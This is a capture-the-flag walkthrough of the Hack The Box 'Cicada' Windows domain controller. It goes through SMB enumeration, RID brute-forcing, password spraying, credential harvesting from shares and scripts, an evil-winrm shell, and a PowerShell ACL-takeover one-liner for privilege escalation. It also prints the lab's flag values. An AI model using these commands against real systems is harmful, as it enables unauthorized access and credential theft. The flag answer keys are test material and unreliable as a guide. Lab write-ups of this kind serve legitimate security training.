Table of contents
Open Table of contents
INFO
CTF URL:https://app.hackthebox.com/machines/Cicada
Machine Type: Windows
IP: 10.10.11.35
Difficulty: Easy
Reconnaissance
NMAP
nmap -p- -sS -sC -sV 10.10.11.35 -v --min-rate 10000
# result
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-04 19:03:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
57150/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h57m52s
| smb2-time:
| date: 2024-10-04T19:03:58
|_ start_date: N/A
Domain: cicada.htb
It is a Domain controller: CICADA-DC.cicada.htb
Shares
Share enumeration gives the following:
smbclient -U "" -L 10.10.11.35
# result
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
It contains some shares.
Let’s try to enumerate them further:
# DEV (and IPC$, NETLOGON, SYSVOL)
smbclient -U "" \\\\10.10.11.35\\DEV
## result
smb: \> # but very limited access
# HR
smbclient -U "" \\\\10.10.11.35\\HR
## result
smb: \> ls
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
smb: \> get "Notice from HR.txt" # download onto local machine
Notice from HR.txt contains:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb\*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account\*\* using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password\*\*. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Default password: Cicada$M6Corpb*@Lp#nZp!8
Now we need to find a user for credentials!
Password Spray
We do not have a user list, but we have a certain password. So, we can spray the same password for a list of users.
A list of users
In order to find users, we can make a RID Brute Force
crackmapexec smb 10.10.11.35 -u 'anonmyous' -p '' --rid-brute
# result
SMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\anonmyous:
SMB 10.10.11.35 445 CICADA-DC [+] Brute forcing RIDs
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator
(SidTypeAlias)
...
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Let’s prepare a list of users:
user.lst
john.smoulder
sarah.dantelia
emily.oscars
david.orelious
michael.wrightson
Password Spray Attack
Using crackmapexec we can get password of michael.wrightson user.
crackmapexec smb 10.10.11.35 -u user.lst -p 'Cicada$M6Corpb*@Lp#nZp!8'
# result
...
[+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
We can note obtained credentials:
| User | Password |
|---|---|
| michael.wrightson | Cicada$M6Corpb*@Lp#nZp!8 |
Further Enumeration
A User left a comment
If we continue enumeration with crackmapexec --users, we can get an interesting note:
crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
# result
...
SMB 10.10.11.35 445 CICADA-DC cicada.htb\david.orelious badpwdcount: 7 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
...
It reveals password of david.orelious
| User | Password |
|---|---|
| michael.wrightson | Cicada$M6Corpb*@Lp#nZp!8 |
| david.orelious | aRt$Lp#7t*VQ!3 |
Access to DEV share
Then, using crackmapexec --shares, we can learn that newly obtained user gives us access READ to DEV share
crackmapexec smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
# result
SMB 10.10.11.35 445 CICADA-DC Share Permissions
SMB 10.10.11.35 445 CICADA-DC ----- -----------
...
SMB 10.10.11.35 445 CICADA-DC DEV READ
...
In DEV share, we can find a Backup Script:
smbclient -U "david.orelious" \\\\10.10.11.35\\DEV
# after we prompt password we get smbclient's shell
smb: \> ls
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
smb: \> get Backup_script.ps1
# ctrl-D
Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
And here we get credentials for another user:
| User | Password |
|---|---|
| michael.wrightson | Cicada$M6Corpb*@Lp#nZp!8 |
| david.orelious | aRt$Lp#7t*VQ!3 |
| emily.oscars | Q!3@Lp#M6b*7t*Vt |
User.txt
If we check emily’s access on shares, we can find that it has READ and WRITE permission on C$:
crackmapexec smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' --shares
# result
...
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ READ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ READ,WRITE Default share
...
And if you connect via smbclient, you can see the you can!
smbclient -U "emily.oscars" \\\\10.10.11.35\\C$
# result
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Thu Mar 14 09:24:03 2024
$WinREAgent DH 0 Mon Sep 23 12:16:49 2024
Documents and Settings DHSrn 0 Thu Mar 14 15:40:47 2024
DumpStack.log.tmp AHS 12288 Tue Nov 19 23:33:17 2024
pagefile.sys AHS 2005602304 Wed Nov 20 04:04:17 2024
PerfLogs D 0 Thu Aug 22 14:45:54 2024
Program Files DR 0 Thu Aug 29 15:32:50 2024
Program Files (x86) D 0 Sat May 8 05:40:21 2021
ProgramData DHn 0 Fri Aug 30 13:32:07 2024
Recovery DHSn 0 Thu Mar 14 15:41:18 2024
Shares D 0 Thu Mar 14 08:21:29 2024
System Volume Information DHS 0 Wed Nov 20 05:25:25 2024
Temp D 0 Wed Nov 20 06:12:36 2024
Users DR 0 Mon Aug 26 16:11:25 2024
Windows D 0 Mon Sep 23 12:35:40 2024
Let’s read user.txt:
smb: \Users\emily.oscars.CICADA\Desktop\> ls
user.txt AR 34 Tue Nov 19 23:34:12 2024
4168447 blocks of size 4096. 58391 blocks available
smb: \Users\emily.oscars.CICADA\Desktop\> get user.txt
# ---
cat user.txt
9f7804d671338e4203071b34621fafcb
Root.txt
Get a shell
We can get a shell using winrm.
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
# result
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Token Abuse
If we check the user’s privileges, we can see that she has SeRestorePrivilege.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
It means we can perform token abuse and get control of unauthorized files.
We can use the following powershell script:
- https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1 I converted it into one liner so we just can copy paste it into winrm session.
function Acl-FullControl {param ($user, $path) $help = "@<synopsis and description content>"; if ($user -eq $null -or $path -eq $null) { $help } else { "[+] Current permissions:"; get-acl $path | fl; "[+] Changing permissions to $path"; $acl = get-acl $path; $acl.AddAccessRule((New-Object System.Security.AccessControl.FileSystemAccessRule ($user, 'FullControl', 'ContainerInherit,ObjectInherit', 'None', 'Allow'))); set-acl -Path $path -AclObject $acl; "[+] Acls changed successfully."; get-acl -path $path | fl } }
Next, take control of Administrator’s folder:
Acl-FullControl -user cicada\emily.oscars -path C:\users\administrator
Finally, read the root.txt
*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
1e36a7087d96b39005544e371f26af70